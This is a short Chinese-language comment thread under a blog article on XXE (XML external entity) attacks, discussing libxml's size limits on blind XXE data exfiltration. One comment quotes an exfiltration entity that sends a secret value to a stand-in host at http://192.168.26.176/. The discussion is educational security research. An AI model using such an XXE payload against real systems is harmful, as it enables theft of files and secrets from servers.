Open utterances-bot opened 4 years ago
注意,经过测试,Troy.xml 中的 <!ENTITY sending SYSTEM 'http://192.168.26.176/?secret=%secret;'> 中的http://192.168.26.176/?secret=%secret;,长度大于 1k 会报错:Detected an entity reference loop。所以 XXE 盲注的时候数据外带的量是有限制的。
这个好像不对,我看到另外一篇文章是: http://www.m4p1e.com/web/20180604.html
看了一下你发的文章。里面提到另一个条件:
其大小是否小于已经加载的内容大小 10 倍 ,并且已经加载的实体引用的数量的 3 倍是否小于已经加载的内容大小的 10 倍。
这个我没遇到过,所以没发现,改天我测试一下,或者你有时间的话不妨测试一下?至于“其大小是否小于 1000 字符 这个是没问题的”。多谢反馈!我也学到了新的知识
@grayguest
XXE 指北 - Tr0y's Blog
Tr0y's Blog
https://www.tr0y.wang/2019/05/03/XXE%E6%8C%87%E5%8C%97/